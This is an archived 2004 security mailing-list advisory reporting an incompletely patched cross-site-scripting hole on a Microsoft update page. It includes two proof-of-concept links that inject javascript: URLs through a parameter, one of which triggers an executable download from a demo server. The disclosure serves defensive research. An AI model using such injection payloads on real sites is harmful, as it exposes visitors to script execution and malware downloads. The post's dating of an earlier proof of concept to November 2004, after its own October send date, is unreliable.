lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <001601c4aa30$571061a0$fe03a8c0@Finjan.co.il> Date: Mon, 4 Oct 2004 18:36:46 +0200 From: "Rafel Ivgi, The-Insider" <rivgi@...jan.com> To: <full-disclosure@...ts.netsys.com>, <Win2KSecAdvice@...ecurity.net>, <vulnwatch@...nwatch.org>, <ntbugtraq@...tserv.ntbugtraq.com>, <Bugtraq@...urityfocus.com> Subject: Cross-Site-Scripting Vulnerability in Microsoft.com Cross Site Scripting In Microsoft.com ***************************** Introduction ------------ It is possible to inject code that executes arbitrary scripts when a user clicks on a link within Microsoft's update site page. A proof of concept can be found below. Technical Details ----------------- On November 1st, 2004 malware published a proof of concept which demonstrated a Cross-Site-Scripting attack in microsoft.com update website. The code he used was taken from Dror Shalev's "Safe Center" (http://www.safecenter.net/crosszone/Top/ServerSide/Dir-wms/WmS-Known.htm). The original XSS hole was found by "Bitlance Winter". The reported bug was fixed a few days ago. However, our testings have shown that the hole was not fully patched. In contrast to the former problem, which enabled an attacker to inject HTML code into web pages, this vulnerability allows an attacker to inject malicious text strings into the vulnerable page. These strings are injected into HTML tags, therefore arbitrary scripts will be executed when a user clicks on the vulnerable link. The Code (Proof Of Concept) ------------------------------------------ To activate these attacks, please click on the link named "security update" under the title "Internet Explorer 6.0" in the Windows update site. * <a href="http://www.microsoft.com/windows/ie/downloads/critical/q316059/downloa d.asp?sTarget=javascript:window.open('https://www.finjan.com','_parent')|/|/ |/|en"> Microsoft Cross Site scripting - Download the patch - DEMO 1 </a> * <a href="http://www.microsoft.com/windows/ie/downloads/critical/q316059/downloa d.asp?sTarget=javascript:window.open('http://www.finjan.com/mcrc/demos/Objec tData/fire.exe','_parent')|/|/|/|en"> Microsoft Cross Site scripting - Download the patch - DEMO 2 </a> Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: rivgi@...jan.com --------------------------------- Prevention is the best cure! ----------------------------------------------- This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)
Powered by blists - more mailing lists